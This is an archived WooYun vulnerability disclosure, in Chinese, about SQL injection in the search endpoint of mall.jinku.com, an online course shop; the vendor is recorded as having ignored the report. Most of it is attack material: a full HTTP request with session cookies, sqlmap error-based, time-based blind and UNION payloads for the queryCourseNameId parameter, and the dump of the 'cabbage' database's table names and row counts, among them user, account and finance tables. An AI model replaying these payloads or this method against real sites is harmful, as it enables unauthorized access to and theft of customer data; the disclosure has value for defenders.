乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-19: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开
POST /goods/goodsType!toSearchGoodsNew.jspx?type=1 HTTP/1.1Content-Length: 582Content-Type: application/x-www-form-urlencodedCookie: SESSION_COOKIE=11; JSESSIONID=5463DEDEE11F6ACF8EC7BAA20FBE0ECDHost: mall.jinku.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*isShowOwn=&pageNo=1&queryCourseNameId=1111&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0
sqlmap resumed the following injection point(s) from stored session:---Parameter: queryCourseNameId (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT 3373 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3373=3373,1))),0x716a707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('zxfn'='zxfn&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') AND (SELECT * FROM (SELECT(SLEEP(5)))bAQF) AND ('ADUy'='ADUy&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0 Type: UNION query Title: MySQL UNION query (NULL) - 1 column Payload: isShowOwn=&pageNo=1&queryCourseNameId=1111') UNION ALL SELECT CONCAT(0x71787a7671,0x746257727a4872624e53,0x716a707071)#&searchGoodCategoryId=0&searchGoodCertificateId=0&searchGoodFormId=0&searchGoodHotTagsId=0&searchGoodHoursId=0.0&searchGoodName=&searchGoodPriceMin=0&searchGoodTagsId=&searchGoodTypeId=0&searchGoodVersionId=0&searchSortBy=0---web application technology: JSPback-end DBMS: MySQL 5.0Database: cabbage+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| sys_web_logger | 3141103 || study_detail | 2282992 || study_record | 1940376 || finance_con_record | 1894992 || finance_con_record_bak | 1884583 || study_sco_7 | 949760 || study_sco_5 | 939103 || study_sco_1 | 937822 || study_sco_2 | 937277 || study_sco_6 | 936209 || study_sco_4 | 935783 || study_sco_9 | 935736 || study_sco_3 | 935592 || study_sco_8 | 934908 || study_sco | 931137 || study_sco_bak_1 | 679724 || study_sco_bak | 554562 || chapter_record | 395504 || v_finance_send_ticket | 395157 || finance_order | 377426 | //订单| useraccounts | 362998 || userinfo | 362997 | //用户| users | 362997 | //用户| testpaper_topic | 254843 || finance_recharge | 202852 || finance_send_ticket | 192305 || study_detail_app | 148818 || junkustudyrecord_temp | 128228 || usersecures | 126264 || usermedals | 122509 || shoppinggood | 90965 || testpaper_report | 90909 || finance_send_ticket_detail | 74242 || qz_testpaper_topic | 63428 || finance_invoice | 53104 || shoppingcart | 36709 || userfive | 29145 || collects | 25999 || new_testpaper_topic | 24660 || evaluate | 19346 || newoptions | 18810 || testpaper_topic_bak | 14907 || new_testpaper_report | 14819 || qz_testpaper_report | 14771 || shoppingparm | 11411 || testpaper_report_bak | 6967 || sys_web_phone_mes_request_info | 6583 || newproblem | 5028 || shopping_protocol | 3737 || spike_log | 3472 || new_testpaper_report_font | 2900 || options | 2792 || testpaper | 1950 || new_testpaper | 1773 || testpaper_report_font | 1673 || finance_user_record | 1353 || newuserfive | 1170 || sys_se_role_r_fr | 1121 || course_item_credit | 1087 || cards | 711 || org_buy_cards | 705 || problem | 699 || l_uo_organization | 616 || qz_testpaper | 558 || item_file | 433 || discount | 419 || goods_courseware | 413 || study_sco_log | 390 || book | 381 || goods_course | 372 || qz_testpaper_report_font | 351 || tgglv_cfp | 320 || course | 286 || goods | 286 || courseflash | 265 || goods_files | 265 || announce | 244 || sys_operation_log | 229 || goods_praise | 225 || qy_testpaper_topic | 199 || tgglv | 181 || stages_newproblem | 172 || friend_invite | 156 || flush_cache | 154 || problembox | 150 || xingjipm | 141 || org_discount | 139 || sys_se_function_resource | 134 || spikeinfo | 111 || testpaper_bak | 108 || finance_refund_approval | 102 || testpaper_report_font_bak | 98 || finance_approval_study | 76 || tags | 71 || exam_counseling | 64 || modular_course | 59 || sys_se_user_r_role | 54 || sys_se_user | 53 || sys_se_user_r_group | 53 || vipprice | 52 || sys_se_role | 47 || sys_se_group_role | 43 || finance_apply_study | 38 || sys_web_phone_mes_request_lump | 36 || typebox_goods | 36 || advertis | 35 || finance_refund | 33 || companyuser | 24 || coursetutor | 21 || qy_testpaper | 19 || modular | 13 || typebox | 13 || spikemachineinfo | 12 || sys_se_group | 12 || goodstype | 11 || items | 6 || l_uo_org_type | 6 || solution | 6 || machine_info | 5 || examtest | 4 || heat_sell | 4 || seckillprice | 4 || other_phone | 3 || site_activity | 3 || company | 2 || infoleft | 2 || stages | 2 || sys_message | 2 || user_msg | 2 || sysrefund | 1 || typebox_companyusers | 1 |+--------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-11-25 09:00
漏洞Rank:15 (WooYun评价)
暂无